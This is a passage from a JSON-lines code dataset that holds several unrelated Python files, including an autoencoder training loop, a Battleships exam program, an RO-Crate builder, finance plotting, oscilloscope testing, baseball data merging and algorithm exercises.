nn.Sigmoid(),\n )\n\n self.ex_decoder = nn.Sequential()\n self.aggr_decoder = nn.Sequential()\n\n def encode(self, x):\n y = self.encoder(x)\n return y\n\n def decode(self, z):\n return self.decoder(z)\n\n def forward(self, x, ex_features=None):\n encoded = self.encode(x)\n us_decoded = self.us_decoder(encoded)\n # ex_decoded = self.ex_decoder(ex_features)\n # aggr_rep = torch.cat([ex_decoded.to(device), us_decoded], dim=1)\n # z = self.aggr_decoder(aggr_rep)\n return us_decoded\n\n\ndef calc_next_len_conv1d(current_len=112500, kernel_size=16, stride=8, padding=0, dilation=1):\n return int(np.floor((current_len + 2 * padding - dilation * (kernel_size - 1) - 1) / stride + 1))\n\n\nmodel = CAE().to(device).double()\n# best at lr=0.0005, weight_decay=1e-5 factor=0.5, patience=5\nlr = 0.0003\nnum_of_iteration = len(train_dataset) // batch_size\n\noptimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=1e-6)\nscheduler = ReduceLROnPlateau(optimizer, factor=0.5, patience=3)\ncriterion = nn.MSELoss()\ncyclic_lr = GenerateLR(max_lr=lr, min_lr_ratio=10, anneal_cycle_pct=10,\n tot_num_iter=(epochs_num * num_of_iteration))\n\n\ndef train(epoch):\n model.train()\n train_loss = 0\n for batch_idx, data in enumerate(train_loader):\n data = data.to(device)\n if len(cyclic_lr) > 0:\n lr = cyclic_lr.pop(0)\n for g in optimizer.param_groups:\n g['lr'] = lr\n optimizer.zero_grad()\n # features = np.random.randn(batch_size, 40)\n recon_batch = model(data)\n loss = criterion(recon_batch, data.view(recon_batch.shape[0], -1))\n loss.backward()\n train_loss += loss.item()\n optimizer.step()\n if batch_idx % log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader),\n loss.item() / len(data)))\n\n print('====> Epoch: {} Average loss: {:.4f}'.format(\n epoch, train_loss / len(train_loader.dataset)))\n\n\ndef test(epoch):\n model.eval()\n test_loss = 0\n with torch.no_grad():\n for batch_idx, data in enumerate(test_loader):\n data = data.to(device)\n recon_batch = model(data)\n loss = criterion(recon_batch, data.view(recon_batch.shape[0], -1))\n test_loss += loss.item()\n # import matplotlib.pyplot as plt\n # plt.plot(np.squeeze(data[0, :, :].cpu().detach().numpy()))\n # plt.plot(np.squeeze(recon_batch[0, :].cpu().detach().numpy()))\n\n if batch_idx == 0:\n n = min(data.size(0), 4)\n\n test_loss /= len(test_loader.dataset)\n print('====> Test set loss: {:.5f}'.format(test_loss))\n # scheduler.step(test_loss)\n print(f'Learning rate: {optimizer.param_groups[0][\"lr\"]:.6f}')\n\n\nif __name__ == \"__main__\":\n for epoch in range(1, epochs_num + 1):\n train(epoch)\n test(epoch)\n","sub_path":"CAE-MIT-BIH.py","file_name":"CAE-MIT-BIH.py","file_ext":"py","file_size_in_byte":10028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"5510364","text":"#Skeleton Program for the AQA AS1 Summer 2016 examination\n#this code should be used in conjunction with the Preliminary Material\n#written by the AQA AS1 Programmer Team\n#developed in a Python 3 programming environment\n\n#Version Number 1.0\n\nimport pickle\nimport random\n\nShipDict = {}\nHardMode = False\nscore = 0\nTurnTaken = False\n\ndef CheckShips(Board):\n NewShipDict = {}\n for ship in ['A', 'B', 'S', 'D', 'P']:\n NewShipDict[ship] = CheckShip(Board, ship)\n return NewShipDict\n\ndef CheckShip(Board, ship):\n for Row in range(10):\n for Column in range(10):\n if Board[Row][Column] == ship:\n return True\n\ndef DisplayHighScores(Scores):\n sortedScores = sorted(Scores, key = Scores.get)\n print()\n print(\"---HIGH SCORES---\")\n for name in sortedScores:\n print('{} : {}'.format(name, Scores[name]))\n\ndef LoadScores():\n global Scores\n File = open('SavedScores.txt', 'rb')\n Scores = pickle.loads(File.read())\n File.close()\n return Scores\n\ndef SaveScores(score, Scores):\n playerName = input(\"What is your name?: \")\n Scores[playerName] = score\n File = open('SavedScores.txt', 'wb')\n pickle.dump(Scores, File)\n File.close()\n\ndef GetRowColumn():\n print()\n Column = int(input(\"Please enter column: \"))\n Row = int(input(\"Please enter row: \"))\n print()\n return Row, Column\n\ndef MakePlayerMove(Board, Ships):\n global TurnTaken\n Row, Column = GetRowColumn()\n if Board[Row][Column] == \"m\" or Board[Row][Column] == \"h\":\n print(\"Sorry, you have already shot at the square (\" + str(Column) + \",\" + str(Row) + \"). Please try again.\")\n elif Board[Row][Column] == \"-\":\n print(\"Sorry, (\" + str(Column) + \",\" + str(Row) + \") is a miss.\")\n Board[Row][Column] = \"m\"\n TurnTaken = True\n else:\n print(\"Hit at (\" + str(Column) + \",\" + str(Row) + \").\")\n Board[Row][Column] = \"h\"\n TurnTaken = True\n\ndef SetUpBoard():\n Board = []\n for Row in range(10):\n BoardRow = []\n for Column in range(10):\n BoardRow.append(\"-\")\n Board.append(BoardRow)\n return Board\n\ndef LoadGame(Filename, Board):\n global ShipDict\n BoardFile = open(Filename, \"r\")\n for Row in range(10):\n Line = BoardFile.readline()\n for Column in range(10):\n Board[Row][Column] = Line[Column]\n ShipDict = {'A' : True,\n 'B': True,\n 'S' : True,\n 'D' : True,\n 'P': True}\n BoardFile.close()\n\ndef PlaceRandomShips(Board, Ships):\n for Ship in Ships:\n Valid = False\n while not Valid:\n Row = random.randint(0, 9)\n Column = random.randint(0, 9)\n HorV = random.randint(0, 3)\n if HorV == 0:\n Orientation = \"v\"\n elif HorV == 1:\n Orientation = \"h\"\n elif HorV == 2:\n Orientation = \"d\"\n elif HorV == 3:\n Orientation = \"bd\"\n Valid = ValidateBoatPosition(Board, Ship, Row, Column, Orientation)\n print(\"Computer placing the \" + Ship[0])\n PlaceShip(Board, Ship, Row, Column, Orientation)\n\ndef PlaceShip(Board, Ship, Row, Column, Orientation):\n if Orientation == \"v\":\n for Scan in range(Ship[1]):\n Board[Row + Scan][Column] = Ship[0][0]\n elif Orientation == \"h\":\n for Scan in range(Ship[1]):\n Board[Row][Column + Scan] = Ship[0][0]\n elif Orientation == \"d\":\n for Scan in range(Ship[1]):\n Board[Row + Scan][Column + Scan] = Ship[0][0]\n elif Orientation == \"bd\":\n for Scan in range(Ship[1]):\n Board[Row + Scan][Column - Scan] = Ship[0][0]\n\ndef ValidateBoatPosition(Board, Ship, Row, Column, Orientation):\n if Orientation == \"v\" and Row + Ship[1] > 10:\n return False\n elif Orientation == \"h\" and Column + Ship[1] > 10:\n return False\n elif Orientation == \"d\" and (Column + Ship[1] > 10 or Row + Ship[1] > 10):\n return False\n elif Orientation == \"bd\" and (Column - Ship[1] < 1 or Row + Ship[1] > 10):\n return False\n else:\n if Orientation == \"v\":\n for Scan in range(Ship[1]):\n if Board[Row + Scan][Column] != \"-\":\n return False\n elif Orientation == \"h\":\n for Scan in range(Ship[1]):\n if Board[Row][Column + Scan] != \"-\":\n return False\n elif Orientation == \"d\":\n for Scan in range(Ship[1]):\n if Board[Row + Scan][Column + Scan] != \"-\":\n return False\n elif Orientation == \"bd\":\n for Scan in range(Ship[1]):\n if Board[Row + Scan][Column - Scan] != \"-\":\n return False\n return True\n\ndef CheckWin(Board):\n for Row in range(10):\n for Column in range(10):\n if Board[Row][Column] in [\"A\",\"B\",\"S\",\"D\",\"P\"]:\n return False\n return True\n\ndef PrintBoard(Board):\n print()\n print(\"The board looks like this: \")\n print()\n print(\" \", end=\"\")\n for Column in range(10):\n print(\" \" + str(Column) + \" \", end=\"\")\n print()\n for Row in range(10):\n print (str(Row) + \" \", end=\"\")\n for Column in range(10):\n if Board[Row][Column] == \"-\":\n print(\" \", end=\"\")\n elif Board[Row][Column] in [\"A\",\"B\",\"S\",\"D\",\"P\"]:\n print(\" \", end=\"\")\n else:\n print(Board[Row][Column], end=\"\")\n if Column != 9:\n print(\" | \", end=\"\")\n print()\n\ndef DisplayMenu():\n print(\"MAIN MENU\")\n print()\n print(\"1. Start new game\")\n print(\"2. Load training game\")\n print(\"3. Toggle Hard Mode\")\n print(\"9. Quit\")\n print()\n\ndef GetMainMenuChoice():\n print(\"Please enter your choice: \", end=\"\")\n Choice = int(input())\n print()\n return Choice\n\ndef PlayGame(Board, Ships):\n global ShipDict\n global score\n global TurnTaken\n GameWon = False\n while not GameWon:\n TurnTaken = False\n PrintBoard(Board)\n MakePlayerMove(Board, Ships)\n NewShipDict = CheckShips(Board)\n for ship in ['A', 'B', 'S', 'D', 'P']:\n if ShipDict[ship] != NewShipDict[ship]:\n print(\"You destroyed the\", ship, \"ship!\")\n ShipDict = NewShipDict\n GameWon = CheckWin(Board)\n if score > 45 and HardMode:\n GameWon = True\n print('You ran out of ammo!')\n if TurnTaken:\n score += 1\n if GameWon:\n print(\"All ships sunk!\")\n Scores = LoadScores()\n SaveScores(score, Scores)\n DisplayHighScores(Scores)\n print()\n\nif __name__ == \"__main__\":\n TRAININGGAME = \"Training.txt\"\n MenuOption = 0\n while not MenuOption == 9:\n Board = SetUpBoard()\n Ships = [[\"Aircraft Carrier\", 5], [\"Battleship\", 4], [\"Submarine\", 3], [\"Destroyer\", 3], [\"Patrol Boat\", 2]]\n DisplayMenu()\n MenuOption = GetMainMenuChoice()\n if MenuOption == 1:\n PlaceRandomShips(Board, Ships)\n PlayGame(Board,Ships)\n if MenuOption == 2:\n LoadGame(TRAININGGAME, Board)\n PlayGame(Board, Ships)\n if MenuOption == 3:\n if HardMode:\n print(\"Hard Mode Off\\n\")\n HardMode = False\n elif not HardMode:\n print(\"Hard Mode On. You now only have 45 ammo\\n\")\n HardMode = True","sub_path":"WARSHIPS/WarshipsMain.py","file_name":"WarshipsMain.py","file_ext":"py","file_size_in_byte":6739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"551397883","text":"#!/usr/bin/env python\n\n## Copyright 2019-2020 The University of Manchester, UK\n##\n## Licensed under the Apache License, Version 2.0 (the \"License\");\n## you may not use this file except in compliance with the License.\n## You may obtain a copy of the License at\n##\n## http://www.apache.org/licenses/LICENSE-2.0\n##\n## Unless required by applicable law or agreed to in writing, software\n## distributed under the License is distributed on an \"AS IS\" BASIS,\n## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n## See the License for the specific language governing permissions and\n## limitations under the License.\n\nimport io\nimport json\nimport os\nimport tempfile\nfrom contextlib import redirect_stdout\n\nimport rocrate.rocrate as roc\n\nfrom rocrate.model import entity\nfrom galaxy2cwl import get_cwl_interface\n\ndef make_workflow_rocrate(workflow_path,wf_type,include_files=[],fetch_remote=False,cwl=None,diagram=None):\n\n # Properties \n # missing? \n # input\n # output\n # programmingLanguage\n # url\n #version\n # sdPublisher - current set to the person that provided the metadata, decision to change to the Workflow Hub itself - Done\n\n # publisher - where it came came from, e.g. Galaxy, github, or WF Hub if uploaded - Done\n\n # producer - to describe the Project or Team Done\n\n # creator - the creators/ authors Done\n\n # maintainer - new recommended property to describe the uploader + additional people with manage rights Done\n\n # funder - example of cordis reference - https://cordis.europa.eu/project/id/730976\n # https://schema.org/FundingScheme linked to funder\n # Examples at the bottom of https://schema.org/Grant - funding looks ideal but not currently legal\n # Is needed to fulfill the OpenAire “Funding Reference” property\n\n # datePublished - becomes an optional property, and we use the date a DOI was minted (this property is needed for dataCite) Done\n\n # creativeWorkStatus - Maturity level, to be added to BioSchemas Done\n\n # Identifier - can be DOI if this function is enabled in WorkflowHub Done\n\n #returns a complete ROCrate object corresponding to a Workflow template file\n # wf_type: Galaxy, CWL , Nextflow..\n # cwl: CWL/CWL-Abstract representation of the workflow. If the\n # diagram: an image/graphical workflow representation.\n # If a CWL/CWLAbstract file is provided then this is generated using cwltool\n #abs_path = os.path.abspath(workflow_path)\n wf_crate = roc.ROCrate()\n # add main workflow file\n file_name = os.path.basename(workflow_path)\n wf_file = wf_crate.add_file(workflow_path,file_name) # should I add it in a special path within the crate?\n wf_crate.set_main_entity(wf_file)\n if wf_type == 'CWL':\n programming_language_entity = entity.Entity(wf_crate,'https://www.commonwl.org/v1.1/', properties={\"@type\": [\"ComputerLanguage\", \"SoftwareApplication\"], 'name':'CWL', 'url':'https://www.commonwl.org/v1.1/', 'version':'1.1'})\n if wf_type == 'Galaxy':\n if not cwl:\n #create cwl_abstract\n with tempfile.NamedTemporaryFile(mode='w', delete=False) as cwl_abstract_out:\n with redirect_stdout(cwl_abstract_out):\n get_cwl_interface.main(['1',workflow_path])\n wf_file = wf_crate.add_file(cwl_abstract_out.name, 'abstract_wf.cwl', properties={\"@type\": [\"ComputerLanguage\", \"SoftwareApplication\"]})\n programming_language_entity = entity.Entity(wf_crate,'https://galaxyproject.org/')\n\n ### SET PROPERTIES\n # A contextual entity representing a SoftwareApplication or ComputerLanguage MUST have a name, url and version,\n # which should indicate a known version the workflow/script was developed or tested with\n if programming_language_entity:\n wf_file['programmingLanguage'] = programming_language_entity\n\n # based on ro-crate specification. for workflows: @type is an array with at least File and Workflow as values.\n wf_type = wf_file['@type']\n if not isinstance(wf_type, list):\n wf_type = [wf_type]\n if 'Workflow' not in wf_type:\n wf_type.append('Workflow')\n if 'SoftwareSourceCode' not in wf_type:\n wf_type.append('SoftwareSourceCode')\n wf_file['@type'] = wf_type\n\n\n # if the source is a remote URL then add https://schema.org/codeRepository property to it\n # this can be checked by checking if the source is a URL instead of a local path\n if 'url' in wf_file.properties().keys():\n wf_file['codeRepository'] = wf_file['url']\n\n # add extra files \n for file_entry in include_files:\n wf_crate.add_file(file_entry)\n \n return wf_crate\n\n","sub_path":"rocrate/rocrate_api.py","file_name":"rocrate_api.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"531107406","text":"#coding=utf-8\n\nimport pandas as pd\nimport numpy as np\nimport QRep\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mticker\n\ndef plot_pev(secID_a,secID_h,start):\n \n a = QRep.get_pev(secID_a, start)\n h = QRep.get_pev(secID_h, start)\n h_a = h['pev'] / a['pev']\n h_a.dropna(inplace=True)\n #print(h_a[-5:])\n \n cmin = min(a['pev'].min(), h['pev'].min() , h_a.min())\n cmax = max(a['pev'].max(), h['pev'].max() , h_a.max())\n ymin = 1.0\n while ymin > cmin and ymin > 0.0:\n ymin = ymin - 0.2\n ymax =1.0\n while ymax < cmax:\n ymax = ymax + 0.2\n \n plt.figure(figsize=(20, 10), facecolor=(.94,.94,.94))\n plt.plot(a.index, a['pev'], label=secID_a[:-5], color='red')\n plt.plot(h.index, h['pev'], label=secID_h[:-5], color='green')\n plt.plot(h_a.index, h_a, label='{0}/{1}'.format(secID_h[:-5], secID_a[:-5] ) , color='black')\n \n plt.text(a.index[0] + pd.Timedelta('20 days'), ymax - 0.3* (ymax-ymin) , '{0}'.format( h_a[-5:] ), fontsize=10)\n \n plt.legend(loc=2,frameon=False, ncol= 5)\n plt.xlim( a.index[0] + pd.Timedelta('-10 days') , a.index[-1] + pd.Timedelta('10 days') )\n #plt.yscale(u'log')\n plt.yticks(np.arange(ymin,ymax,0.2))\n \n ax = plt.gca()\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False) \n ax.set_facecolor((.94,.94,.94))\n ax.grid(b=True, axis='y', which='major', color='gray', linestyle='--', linewidth = 0.5)\n \n plt.tight_layout()\n mng = plt.get_current_fig_manager()\n mng.window.state('zoomed') #works fine on Windows!\n \n plt.show()\n\n\n#plot_pev('601088.XSHG','01088.XHKG','2010-01-01')\n\n#plot_pev('601318.XSHG','02318.XHKG','2012-01-01')\n#plot_pev('601601.XSHG','02601.XHKG','2015-01-01')\n#plot_pev('601336.XSHG', '01336.XHKG','2012-01-01')\n\n\n#plot_pev('601288.XSHG','01288.XHKG','2014-01-01')\n#plot_pev('600036.XSHG','03968.XHKG','2014-01-01')\n#plot_pev('601939.XSHG','00939.XHKG','2014-01-01')\n#plot_pev('600016.XSHG','01988.XHKG','2014-01-01')\n\n#plot_pev('601166.XSHG','601288.XSHG','2014-01-01')\nplot_pev('601288.XSHG','601939.XSHG','2012-01-01')\n#plot_pev('601169.XSHG','600016.XSHG','2012-01-01')\n#plot_pev('601601.XSHG', '601318.XSHG','2014-01-01')\n\n","sub_path":"Finpy/PEV.py","file_name":"PEV.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"202574600","text":"# OscilloscopeConnectionTest.py\n#\n# This example performs a connection test.\n#\n# Find more information on http://www.tiepie.com/LibTiePie .\n\nfrom __future__ import print_function\nimport time\nimport sys\nimport libtiepie\nfrom printinfo import *\n\n# Print library info:\nprint_library_info()\n\n# Enable network search:\nlibtiepie.network.auto_detect_enabled = True\n\n# Search for devices:\nlibtiepie.device_list.update()\n\n# Try to open an oscilloscope with connection test support:\nscp = None\nfor item in libtiepie.device_list:\n if item.can_open(libtiepie.DEVICETYPE_OSCILLOSCOPE):\n scp = item.open_oscilloscope()\n if scp.has_connection_test:\n break\n else:\n scp = None\n\nif scp:\n try:\n # Enable all channels that support connection testing:\n for ch in scp.channels:\n ch.enabled = ch.has_connection_test\n\n # Print oscilloscope info:\n print_device_info(scp)\n\n # Start connection test:\n scp.start_connection_test()\n\n # Wait for connection test to complete:\n while not scp.is_connection_test_completed:\n time.sleep(0.01) # 10 ms delay, to save CPU time\n\n # Get data:\n result = scp.get_connection_test_data()\n\n # Print result:\n print()\n print('Connection test result:')\n ch = 1\n for value in result:\n print('Ch' + str(ch) + ' = ' + str(value))\n ch += 1\n\n except Exception as e:\n print('Exception: ' + e.message)\n sys.exit(1)\n\n # Close oscilloscope:\n del scp\n\nelse:\n print('No oscilloscope available with connection test support!')\n sys.exit(1)\n\nsys.exit(0)\n","sub_path":"examples/OscilloscopeConnectionTest.py","file_name":"OscilloscopeConnectionTest.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"265651889","text":"import pandas as pd\n\n\ndef team_rename(name):\n if name == \"Dodgers\":\n return \"LAD\"\n if name == \"Red Sox\":\n return \"BOS\"\n if name == \"Brewers\":\n return \"MIL\"\n if name == \"Astros\":\n return \"HOU\"\n if name == \"Yankees\":\n return \"NYY\"\n if name == \"Braves\":\n return \"ATL\"\n if name == \"Indians\":\n return \"CLE\"\n if name == \"Rockies\":\n return \"COL\"\n if name == \"Cubs\":\n return \"CHC\"\n if name == \"Royals\":\n return \"KC\"\n if name == \"Mariners\":\n return \"SEA\"\n if name == \"Padres\":\n return \"SD\"\n if name == \"Mets\":\n return \"NYM\"\n if name == \"Twins\":\n return \"MIN\"\n if name == \"Reds\":\n return \"CIN\"\n if name == \"Angels\":\n return \"LAA\"\n if name == \"Giants\":\n return \"SF\"\n if name == \"Phillies\":\n return \"PHI\"\n if name == \"Orioles\":\n return \"BAL\"\n if name == \"Diamondbacks\":\n return \"ARI\"\n if name == \"White Sox\":\n return \"CWS\"\n if name == \"Cardinals\" or name == \"St.Louis Cardinals\":\n return \"STL\"\n if name == \"Blue Jays\":\n return \"TOR\"\n if name == \"Nationals\":\n return \"WSH\"\n if name == \"Athletics\":\n return \"OAK\"\n if name == \"Rangers\":\n return \"TEX\"\n if name == \"Pirates\":\n return \"PIT\"\n if name == \"Marlins\" or name == \"Florida Marlins\":\n return \"MIA\"\n if name == \"Tigers\":\n return \"DET\"\n if name == \"Rays\":\n return \"TB\"\n else:\n print(\"No name match found for \"+name)\n return \"\"\n\n# if __name__ == '__main__':\n# new_home = []\n# df = pd.read_csv('pitcher_data.csv')\n# for i in df['Team']:\n# b = team_rename(i)\n# new_home.append(b)\n# df['Team'] = pd.DataFrame(new_home)\n# print(df)\n# df.to_csv('pitcher_data.csv',index=False)\n\n# df = pd.read_csv('games.csv')\n# df2 = pd.read_csv('id_map.csv')\n# print(df2)\n# print(df)\n#\n# df.playerid = df.playerid.astype(str)\n# df2.IDFANGRAPHS = df2.IDFANGRAPHS.astype(str)\n# df2.MLBID = df2.MLBID.astype(str)\n#\n# df3 = pd.merge(df, df2, left_on=['playerid'], right_on=['IDFANGRAPHS'],how='left')\n# df3.to_csv('batter_data.csv',index=False)\n\n# print(df)\n# away = []\n# home = []\n# for i in df['matchup']:\n# a = i.split('@')[0]\n# away.append(a)\n# b = i.split('@')[1]\n# home.append(b)\n# df['home'] = pd.DataFrame(home)\n# df['away'] = pd.DataFrame(away)\n#\n# print(df)\n# df.to_csv('games.csv',index=False)\n# df2 = pd.read_csv('demo.csv')\n# print(df2)\n# df3 = pd.merge(df, df2, left_on=['date','home','away','umpire_K/BB'], right_on=['date','team_home','team_away','umpire_K/BB'],how='left')\n#\n# print(df3)\n# #df3.to_csv('demo_games.csv',index=False)\n#\n# df3.drop_duplicates( subset=None,keep='first', inplace=True)\n# df3.to_csv('demo_games.csv',index=False)\n\n\ndf = pd.read_csv('demo_games.csv',dtype={'home_pitcher':str,'season':str})\ndf2 = pd.read_csv('./player_data/pitcher_data.csv',dtype={'ID':str,'Season':str})\n\n\n# season=[]\n# for sea in df['date']:\n# season.append(sea[0:4])\n# df['season'] = pd.DataFrame(season)\n# df.to_csv('demo_games.csv')\nprint(df.columns)\nprint('\\n',df2.columns)\n#\n#\n\n\n# df.home_pitcher = df.home_pitcher.astype(str)\n# df.season = df.season.astype(str)\n# df2.Season = df2.Season.astype(str)\n# df2.ID = df2.ID.map(lambda x : ('%.0f')%x ).astype(str)\n\nprint(df.home_pitcher)\nprint(df.season)\nprint(df2.Season)\nprint(df2.ID)\nprint(df2)\n#\n# new = []\n# for i in df2.ID:\n# new.append(i[0:6])\n# df2.ID = pd.DataFrame(new).astype(int)\n# df2.to_csv('./player_data/pitcher_data.csv',index=False)\n# print(df2.ID)\n#\n#\ndf3 = pd.merge(df, df2, left_on=['season','home_pitcher'], right_on=['Season','ID'],how='left')\n\nprint(df3)\ndf3.to_csv('./testttttt.csv',index=False)\n","sub_path":"data_engineering/tm_transform.py","file_name":"tm_transform.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"533036323","text":"# Copyright 2014 Mirantis Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import print_function\n\nfrom oslo_config import cfg\n\nfrom tempest import config # noqa\n\nservice_available_group = cfg.OptGroup(name=\"service_available\",\n title=\"Available OpenStack Services\")\n\nServiceAvailableGroup = [\n cfg.BoolOpt(\"watcher\",\n default=True,\n help=\"Whether or not watcher is expected to be available\"),\n]\n\n\nclass TempestConfigProxyWatcher(object):\n \"\"\"Wrapper over standard Tempest config that sets Watcher opts.\"\"\"\n\n def __init__(self):\n self._config = config.CONF\n config.register_opt_group(\n cfg.CONF, service_available_group, ServiceAvailableGroup)\n self._config.share = cfg.CONF.share\n\n def __getattr__(self, attr):\n return getattr(self._config, attr)\n\n\nCONF = TempestConfigProxyWatcher()\n","sub_path":"watcher/contrib/tempest/tempest/config_infra_optim.py","file_name":"config_infra_optim.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"89121578","text":"\nfrom django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.user_login, name='login'),\n path('register/', views.user_register, name='register'),\n path('dashboard/', views.dashboard, name='dashboard'),\n path('logout/', views.user_logout, name='logout'),\n path('fetch/', views.fetch, name='fetch'),\n path('block//', views.block, name='block'),\n path('ignore//', views.ignore, name='ignore'),\n path(\"submit/\", views.submit, name='submit'),\n path(\"course/print\", views.print_form, name='print_form'),\n path(\"course/registration\", views.reg_form, name='reg_form'),\n]\n","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"405118091","text":"#!/usr/bin/env python\n\n#REQUIRES: novoalign and samtools\n#REQUIRES: a map file, with first column as sample ID, and second file as which fasta it goes to. The reason you have different fastas for different samples is because of divergent mtDNA genomes\n#elements in the map file are separated by a tab\n\n#This script aligns your paired and unpaired reads to a reference using novoalign, and makes a pileup file using samtools\n\nimport os\nimport sys\nimport argparse\nimport multiprocessing\nfrom Bio.Nexus import Nexus\n\ndef align(element):\n\n\tvariables = dict(\n\tthefile = element,\n\tnewfile = element[:-5] + 'nexus'\n\t) #name your output\n\n\tcommands = \"\"\"\n\tpython fasta2Nexus.py {thefile} {newfile}\n\t\"\"\".format(**variables)\n\n\tcmd_list = commands.split(\"\\n\")\n\tfor cmd in cmd_list:\n\t\tos.system(cmd)\n\nthedir = [f for f in os.listdir('.') if os.path.isfile(f)]\n\nfile_list = []\n\nfor thing in thedir:\n\tif '_analyze.fasta' in thing:\n\t\talign(thing)\n\t\tfile_list.append(thing[:-5] + 'nexus')\n\n\nnexi = [(fname, Nexus.Nexus(fname)) for fname in file_list]\n\ncombined = Nexus.combine(nexi)\ncombined.write_nexus_data(filename=open(sys.argv[1], 'w'))\n","sub_path":"14treebuilding/concatenatedFile.py","file_name":"concatenatedFile.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"362025640","text":"import re\nimport heapq\n\n\nclass HeapqObj(object):\n def __init__(self, word, cnt):\n self.word = word\n self.cnt = cnt\n\n def __lt__(self, other):\n \"\"\" if cnt is equal for ['newshop', 'shopnow'],\n put shopnow on top of heap as a smallest object\n \"\"\"\n return (self.cnt < other.cnt) or self.cnt == other.cnt and self.word > other.word\n\n def __str__(self):\n return self.word\n\nimport operator\ndef topCompetitors(topNCompetitors, competitors, reviews):\n aggr = {cmp: 0 for cmp in competitors}\n for cmp in competitors:\n for rev in reviews:\n # use re to find a match, because competitor may appear in a review as: 'cmp,' or 'Cmp'\n match = re.findall(cmp, rev, re.IGNORECASE)\n aggr[cmp] += len(match)\n # if match:\n\n print(aggr)\n heap = []\n for cmp, cnt in aggr.items():\n obj = HeapqObj(cmp, cnt)\n heapq.heappush(heap, obj)\n print([(obj.word, obj.cnt) for obj in heap])\n if len(heap) > topNCompetitors:\n heapq.heappop(heap)\n\n print([(obj.word, obj.cnt )for obj in sorted(heap, reverse=True, key=operator.attrgetter('cnt'))])\n return [obj.word for obj in sorted(heap, reverse=True, key=operator.attrgetter('cnt'))]\n\n\n# ans = topCompetitors(2,\n# ['newshop', 'mymarket', 'shopnow'],\n# ['newshop is newshop', 'shopnow shopnow', 'mymarket is gre mymarket mymarket mymarket', 'dsfhds'])\n# assert ans == ['mymarket', 'newshop'], ans\n#\n\ncomp = [\n\"anacell\",\n\"betacellular\",\n\"cetracular\",\n\"deltacellular\",\n\"eurocell\",\n]\nrev = [\n\"I love anacell Best services provided by anacell in the town\",\n\"betacellular has great services\",\n\"deltacellular provides much better services than betacellular\",\n\"cetracular is worse than eurocell\",\n\"betacellular is better than deltacellular\",\n]\n\nans = topCompetitors(2, comp, rev)\nprint(ans)","sub_path":"python/examples/leetcode/amazon/top-n-competitors.py","file_name":"top-n-competitors.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"144596378","text":"class NumMatrix(object):\n def __init__(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n \"\"\"\n if not matrix:\n return\n self.m, self.n = len(matrix), len(matrix[0])\n self.tree, self.nums = [[0] * (self.n + 1) for _ in range(self.m + 1)], [[0] * self.n for _ in range(self.m)]\n for i in range(self.m):\n for j in range(self.n):\n self.update(i, j, matrix[i][j])\n\n def update(self, row, col, val):\n \"\"\"\n :type row: int\n :type col: int\n :type val: int\n :rtype: void\n \"\"\"\n if self.m == 0 or self.n == 0:\n return\n delta = val - self.nums[row][col]\n self.nums[row][col] = val\n if delta == 0:\n return\n i = row + 1\n while i <= self.m:\n j = col + 1\n while j <= self.n:\n self.tree[i][j] += delta\n j += j & (-j)\n i += i & (-i)\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"\n :type row1: int\n :type col1: int\n :type row2: int\n :type col2: int\n :rtype: int\n \"\"\"\n return self.accu(row2 + 1, col2 + 1) - self.accu(row2 + 1, col1) - self.accu(row1, col2 + 1) + self.accu(row1, col1)\n\n def accu(self, row, col):\n i, ans = row, 0\n while i > 0:\n j = col\n while j > 0:\n ans += self.tree[i][j]\n j -= j & (-j)\n i -= i & (-i)\n return ans\n\nif __name__ == \"__main__\":\n m = NumMatrix([[3,0,1,4,2],[5,6,3,2,1],[1,2,0,1,5],[4,1,0,1,7],[1,0,3,0,5]])\n print(m.sumRegion(2,1,4,3))\n pass\n","sub_path":"rangeSumQuery2DMutable.py","file_name":"rangeSumQuery2DMutable.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"394904314","text":"import nltk\nimport pandas as pd\nimport numpy as np\n\"\"\"\nHelper functions for data mining lab session 2018 Fall Semester\nAuthor: Elvis Saravia\nEmail: ellfae@gmail.com\n\"\"\"\n\ndef format_rows(docs):\n \"\"\" format the text field and strip special characters \"\"\"\n D = []\n for d in 